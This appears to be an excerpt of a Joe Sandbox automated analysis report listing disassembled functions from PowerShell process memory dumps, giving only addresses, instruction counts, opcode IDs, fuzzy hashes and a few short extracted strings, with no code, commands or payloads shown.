                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: cfbe5afa9d6979e94818d9dd7301e3a76ab3665c6f1706df2cb716cf5c03a0b4
                                                                                                                                                • Instruction ID: 9b61f52c596fb124aef858f5b188985f77caf9b20209f09403dff07fba05b0d5
                                                                                                                                                • Opcode Fuzzy Hash: cfbe5afa9d6979e94818d9dd7301e3a76ab3665c6f1706df2cb716cf5c03a0b4
                                                                                                                                                • Instruction Fuzzy Hash: 5A223874A002499FCB05CFA8C494AAEFBB2FF88314F248559E815AB365D731FD55CBA0
                                                                                                                                                Function 04EA4AA8 Relevance: .3, Instructions: 329COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8236a40468c4a291c12659d895db709be5b09408f3a210864e3b33981c81c377
                                                                                                                                                • Instruction ID: 5e24b98d24ba07ddcaff187185be812a5cd42338b52f964e2d422fa1455d0002
                                                                                                                                                • Opcode Fuzzy Hash: 8236a40468c4a291c12659d895db709be5b09408f3a210864e3b33981c81c377
                                                                                                                                                • Instruction Fuzzy Hash: F2D12B74A002189FDB05CFA8D484A9DFBB2FF88314F249559E809AB391D771FD92CB90
                                                                                                                                                Function 04EA39B0 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 76b413776afeb67cf4d0243ce0bc8e9d371c10b816996671de0e629b5a19bf0f
                                                                                                                                                • Instruction ID: 28b212b0c8add4f40bd0159516548db7e48a10ba497631860da1f9590a34c13a
                                                                                                                                                • Opcode Fuzzy Hash: 76b413776afeb67cf4d0243ce0bc8e9d371c10b816996671de0e629b5a19bf0f
                                                                                                                                                • Instruction Fuzzy Hash: 37D1F274A00218AFDB15DFA8D484A9DFBB2FF88314F248159E849AB355D731FD92CB90
                                                                                                                                                Function 04EA9180 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1bb6b4d9bd5b314c888df5bfb7a43fcebc80b20cc2c5591e95efdb008e94a581
                                                                                                                                                • Instruction ID: db874903acd076551fd8396f7efa97954dbab4f1e78897b64edd388240e6d2fe
                                                                                                                                                • Opcode Fuzzy Hash: 1bb6b4d9bd5b314c888df5bfb7a43fcebc80b20cc2c5591e95efdb008e94a581
                                                                                                                                                • Instruction Fuzzy Hash: 99C18C71A002089FDB14DFA8D584A9DBBF2FF84314F158959E406AF266DB34FC59CB90
                                                                                                                                                Function 04EAEDE4 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2c03730202281f03c1326fbe96dd939db5c805d9b26d1ba8d211d658aad1ab15
                                                                                                                                                • Instruction ID: e15455a5aeb857ae09d67bdfec768c665e79a840765d8c6dd42ec6a6d1d92e3c
                                                                                                                                                • Opcode Fuzzy Hash: 2c03730202281f03c1326fbe96dd939db5c805d9b26d1ba8d211d658aad1ab15
                                                                                                                                                • Instruction Fuzzy Hash: A1B14F70E002099FDF14CFA8D8857DEBBF1EF88318F149529E815AB254EB75B855CB81
                                                                                                                                                Function 04EAF6B5 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 136162657576538032ea9dec27c53077d066b2e4c31de866997966ca6f641670
                                                                                                                                                • Instruction ID: 4640ac4e85eb2a98ac8d201b7339ec68926f38288118852d42c20f5a6725024f
                                                                                                                                                • Opcode Fuzzy Hash: 136162657576538032ea9dec27c53077d066b2e4c31de866997966ca6f641670
                                                                                                                                                • Instruction Fuzzy Hash: 73A15C70E10209DFDB14CFA8D8857DDBBF2AF48318F149529E815EB294EB74B895CB81
                                                                                                                                                Function 04EAF42C Relevance: .2, Instructions: 193COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b96a3a4ad94bf6e13bd0b0c4a1790faba9de270ab30ae9cc3ca5936e94a116ad
                                                                                                                                                • Instruction ID: 05838531f46369c832ad4ec2c29302f9f18accfe3bc72ab5a0c7a8722145c074
                                                                                                                                                • Opcode Fuzzy Hash: b96a3a4ad94bf6e13bd0b0c4a1790faba9de270ab30ae9cc3ca5936e94a116ad
                                                                                                                                                • Instruction Fuzzy Hash: 22719DB0E00209CFDF14CFA8D8857DEBBF2AF88318F149529D415AB264EB74A851CF95
                                                                                                                                                Function 04EA9AB6 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a3151ce87ee79d47af45b6e75c7abefa448e0289813ccaf009db4b301938b158
                                                                                                                                                • Instruction ID: 32308253d3bcaa839be492b2fca0077b6595ffc27e203a2be835c0d370955193
                                                                                                                                                • Opcode Fuzzy Hash: a3151ce87ee79d47af45b6e75c7abefa448e0289813ccaf009db4b301938b158
                                                                                                                                                • Instruction Fuzzy Hash: E7714AB0A00219DFDF14DFA5D490AADBBF2FF88304F148869E415AB291DB35AD46CB80
                                                                                                                                                Function 04EA9948 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c29ec230cdde248b256c129aa909b7b3589799ac6ecc4a0a59efa01ff8635a0d
                                                                                                                                                • Instruction ID: 5e0e1ac0139863efe65cfb0acdfbee73657d27a80ee3871b042bb9817736830c
                                                                                                                                                • Opcode Fuzzy Hash: c29ec230cdde248b256c129aa909b7b3589799ac6ecc4a0a59efa01ff8635a0d
                                                                                                                                                • Instruction Fuzzy Hash: FB716C70A00209CFCB14DF69C884A9EBBF6FF84314F14896AE459AB651DB75BC46CB80
                                                                                                                                                Function 04EAF438 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: efddf8179458d4db505f4bf10e15066f9569d61c66363cb34c6c1fce0c599907
                                                                                                                                                • Instruction ID: b74e5b1692b5d101870ebdcd88de2c03cedd3e3bd9ffc6aef66b9541cdebd853
                                                                                                                                                • Opcode Fuzzy Hash: efddf8179458d4db505f4bf10e15066f9569d61c66363cb34c6c1fce0c599907
                                                                                                                                                • Instruction Fuzzy Hash: BC714CB0E00209DFDF14CFA9C8857DEBBF2AF88318F149529E415AB254EB74A851CF95
                                                                                                                                                Function 07C1A59D Relevance: .1, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8f51622c280e0d98a7e2b37f4006e06f2fea696d541169bdab9cddc82fd0d01a
                                                                                                                                                • Instruction ID: 53527756fafce16ac22308d5a7598a6602e5bef1c7961108244123ba5a1d1aa8
                                                                                                                                                • Opcode Fuzzy Hash: 8f51622c280e0d98a7e2b37f4006e06f2fea696d541169bdab9cddc82fd0d01a
                                                                                                                                                • Instruction Fuzzy Hash: F041E6F1A022069FCB258F25C581A7EBBB2AF87354F15C0B9D8049F252D735DA81DBE1
                                                                                                                                                Function 04EA96D9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7c5fb78628bcec9ea155365bd60c8953e66192c9f538ffb7d6daaf603297720a
                                                                                                                                                • Instruction ID: dd2a2c5308d50c7a1099358532b27cdba40de7f77597565d2e0b0e4a469898cb
                                                                                                                                                • Opcode Fuzzy Hash: 7c5fb78628bcec9ea155365bd60c8953e66192c9f538ffb7d6daaf603297720a
                                                                                                                                                • Instruction Fuzzy Hash: 77416D70B00200DFD715DB24C9A8AAABBF6EF89744F055868E406EB7A1DB34AC41CB90
                                                                                                                                                Function 04EA9933 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bd25fc44e7610a5724ddfe535271243cfe41b7bf8cc9651448b122424b437f4b
                                                                                                                                                • Instruction ID: 006ca39f68d525284cfc82bf428cc7835ab013bf0827da664e73af146d833ad3
                                                                                                                                                • Opcode Fuzzy Hash: bd25fc44e7610a5724ddfe535271243cfe41b7bf8cc9651448b122424b437f4b
                                                                                                                                                • Instruction Fuzzy Hash: B7415D70A00215DFDB14DFA9C89469DBBF2FF88304F158829D405AB391DB75BC45CB90
                                                                                                                                                Function 04EA3060 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b98be58713bc3265ac681be786af9e2f6694ecc2a832eab75ec49a0b8debb982
                                                                                                                                                • Instruction ID: a56a009aabf0b40f32b239e8115d071bcf511c21ea65a20f3cf06a47d8bc576b
                                                                                                                                                • Opcode Fuzzy Hash: b98be58713bc3265ac681be786af9e2f6694ecc2a832eab75ec49a0b8debb982
                                                                                                                                                • Instruction Fuzzy Hash: 68414974A005059FCB06CF58C4D89AEFBB1FF48314B2586A9D815AB364C732FC65CBA0
                                                                                                                                                Function 07C1801E Relevance: .1, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e23cd8d13cabf89ae9f856faa678d0f3d5111c8479c28a7ed938b8ad7845e2b7
                                                                                                                                                • Instruction ID: 02763e390fab816280778faff30deb26472096888a3785ed6b26d06260cbd9c3
                                                                                                                                                • Opcode Fuzzy Hash: e23cd8d13cabf89ae9f856faa678d0f3d5111c8479c28a7ed938b8ad7845e2b7
                                                                                                                                                • Instruction Fuzzy Hash: 1E31A2B4740114AFD7189778C855FAF7BB3AB85754F20C428E9017F395CE799C418BA1
                                                                                                                                                Function 07C10E18 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 87d450d5a00258f109699185761c9c11dac878cb105503cc0b9904738dc51905
                                                                                                                                                • Instruction ID: 157fcd243d501a19026a5e8d100f82283810a3eb0f67580eba31c8570846b607
                                                                                                                                                • Opcode Fuzzy Hash: 87d450d5a00258f109699185761c9c11dac878cb105503cc0b9904738dc51905
                                                                                                                                                • Instruction Fuzzy Hash: C3216EF130431AA7DB245A7B848073BB7969FC6711F24C43AD945DB384EE75DAC19360
                                                                                                                                                Function 04EAC3B8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 94e8399958f90794a82fbfd7e23164ee7c124e037bf51981c688b7639dbf95e5
                                                                                                                                                • Instruction ID: 7432e7c06e524ad136ea270126f19d3a5db1b4265f9bffa80eb4899d649d00d2
                                                                                                                                                • Opcode Fuzzy Hash: 94e8399958f90794a82fbfd7e23164ee7c124e037bf51981c688b7639dbf95e5
                                                                                                                                                • Instruction Fuzzy Hash: 02310A30B001288FCB25DB64C8546EEB7B2BF89308F1454E9D50AAB351DF35AE96CF85
                                                                                                                                                Function 04EA3989 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e99fe0df9d7dad8a03e7f13fd8168b309cb40a25895e86460bb8ed387116a569
                                                                                                                                                • Instruction ID: 6c011ecc68a202ecfe8272e0f8301b4eeee1fd70ddb6f11ad49bca4e68913078
                                                                                                                                                • Opcode Fuzzy Hash: e99fe0df9d7dad8a03e7f13fd8168b309cb40a25895e86460bb8ed387116a569
                                                                                                                                                • Instruction Fuzzy Hash: 4031B0B5A042469FCB01CF99C4849A9FFB1FF49320B15819AD858EB755D331FC51CBA1
                                                                                                                                                Function 07C10DFB Relevance: .1, Instructions: 78COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: dbf1e9e1b5aa09eda819bd7843c6394b3be8c5bb2b3b00d5f0b260d2e8538171
                                                                                                                                                • Instruction ID: eda953817651e9b1058dcdef4947c0d5f7410dd987bc6750c90dfadcaf34139d
                                                                                                                                                • Opcode Fuzzy Hash: dbf1e9e1b5aa09eda819bd7843c6394b3be8c5bb2b3b00d5f0b260d2e8538171
                                                                                                                                                • Instruction Fuzzy Hash: 6D215EF2708359ABDB204A6B48407767B965F97300F28C4359944DF2D5EA79DAC0D364
                                                                                                                                                Function 07C10C08 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 02d494ac1d0e54d047e70664d745ebaec93caf12bde40eaf52f728424b19231d
                                                                                                                                                • Instruction ID: d41010c6d4618c1ad93ff085f3fde6db33d63e2f8689a595bc912837c1ae1df0
                                                                                                                                                • Opcode Fuzzy Hash: 02d494ac1d0e54d047e70664d745ebaec93caf12bde40eaf52f728424b19231d
                                                                                                                                                • Instruction Fuzzy Hash: D701427631021A8BCB2059AAD45017BF79AEBC3222F14C03FD849CB600DA32CAC5EB61
                                                                                                                                                Function 04EAF0DB Relevance: .0, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0a0455b13834ef16110e806153dc33bb43f601e4fd5e1015144bb49b8d4dcbf4
                                                                                                                                                • Instruction ID: 9569e84e0261b208dedbc4b671799ceee31bacb56767f99fb4d29748eb340652
                                                                                                                                                • Opcode Fuzzy Hash: 0a0455b13834ef16110e806153dc33bb43f601e4fd5e1015144bb49b8d4dcbf4
                                                                                                                                                • Instruction Fuzzy Hash: 4A11F870D00148DBEF34DB94D99C7ECBBB1AF1431EF142629C001BA191EB3578A9CB15
                                                                                                                                                Function 04D8D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1966730959.0000000004D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D8D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4d8d000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 426e57695b7b9719baede655a879fa944ac0b8cb10f0432d6c54fed7c9907056
                                                                                                                                                • Instruction ID: 2e41b1a51933c1d782fb4d6c0df22b359f3ef821ab3bd6c3db2598d0a1c2e563
                                                                                                                                                • Opcode Fuzzy Hash: 426e57695b7b9719baede655a879fa944ac0b8cb10f0432d6c54fed7c9907056
                                                                                                                                                • Instruction Fuzzy Hash: FA01F7716043449AE720AF16EC84B76BF99EF45724F18C41EED494F2C2D279E841C6B1
                                                                                                                                                Function 04D8D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1966730959.0000000004D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D8D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4d8d000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4b071acdd95fe0178db8b9038edf2f74ac1cd464c708bb5005759c9e92cae7d3
                                                                                                                                                • Instruction ID: bc58ce47a1e19274bee2b1bad73963315d336064fb8432fa90a2725927b15aae
                                                                                                                                                • Opcode Fuzzy Hash: 4b071acdd95fe0178db8b9038edf2f74ac1cd464c708bb5005759c9e92cae7d3
                                                                                                                                                • Instruction Fuzzy Hash: F001526210E3C05EE7129B259C94B62BFB4EF43224F1981DBD9888F1E7C2695845C772
                                                                                                                                                Function 07C13304 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 65db04333de62f4c97bf277f9f863fbb6f0310c402b28a1667d3399419f996f1
                                                                                                                                                • Instruction ID: f1bd9b982bef47da0ec2c70315c99b2c8d850685b1a57b926f4dd6fb10213002
                                                                                                                                                • Opcode Fuzzy Hash: 65db04333de62f4c97bf277f9f863fbb6f0310c402b28a1667d3399419f996f1
                                                                                                                                                • Instruction Fuzzy Hash: 5AF0E57520A3C1DFD7168B04D890995BB71AF83218B5CC1E7D008CF2A7CB358A47D751
                                                                                                                                                Function 07C131B4 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0e0ad2f53bb87613f363253b08fd5e18c5bb3cba9e8787a4cba2871c14b24722
                                                                                                                                                • Instruction ID: f6a0ec389d3f3ddf9b9a8ade5ebe98987b405e41b4366c67020565b9bd06d86e
                                                                                                                                                • Opcode Fuzzy Hash: 0e0ad2f53bb87613f363253b08fd5e18c5bb3cba9e8787a4cba2871c14b24722
                                                                                                                                                • Instruction Fuzzy Hash: EAF039B46092819FD7128B10C894B10BB72AF83209F2AC1EBD4488F1A3C3338A46D751

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 07C124F0 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2206979638
                                                                                                                                                • Opcode ID: 9fb231f6e06c115cd0090450c1a980935927368f73c24ba3963ebf6054df17d9
                                                                                                                                                • Instruction ID: 6c79d8603b20a9778ad1188ef581adf7ed89d202fc94a771c448cd8dc8e14ab2
                                                                                                                                                • Opcode Fuzzy Hash: 9fb231f6e06c115cd0090450c1a980935927368f73c24ba3963ebf6054df17d9
                                                                                                                                                • Instruction Fuzzy Hash: 23A13DF970420ADFDB254B79D89076BBBA1FF87250F24807AD805CB291EB35C981D7A1
                                                                                                                                                Function 07C1D408 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$TQyq$TQyq$tPtq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-719196113
                                                                                                                                                • Opcode ID: 4501f213a99ef1511f34d1d9d139933687fbbb31b4c0780d0d7e00bf45388e92
                                                                                                                                                • Instruction ID: e1cf71b877be974afe654165842e6f7ec41bf513e946d3f20b3d784d7ae16e08
                                                                                                                                                • Opcode Fuzzy Hash: 4501f213a99ef1511f34d1d9d139933687fbbb31b4c0780d0d7e00bf45388e92
                                                                                                                                                • Instruction Fuzzy Hash: BC5191F070460ADBCB24CE09D584766B7B2BB47315F5484B6E80B9B290C775EE90EB91
                                                                                                                                                Function 07C19C38 Relevance: 9.2, Strings: 7, Instructions: 483COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-3181550632
                                                                                                                                                • Opcode ID: 932a192265a9c2162c3215bb51544de54a9c8172b30057d18f375ed6fe65766c
                                                                                                                                                • Instruction ID: f16f0661fe447896bb5626369a8ab8b47ee5f3913b520ae8afa9686ba5602f5b
                                                                                                                                                • Opcode Fuzzy Hash: 932a192265a9c2162c3215bb51544de54a9c8172b30057d18f375ed6fe65766c
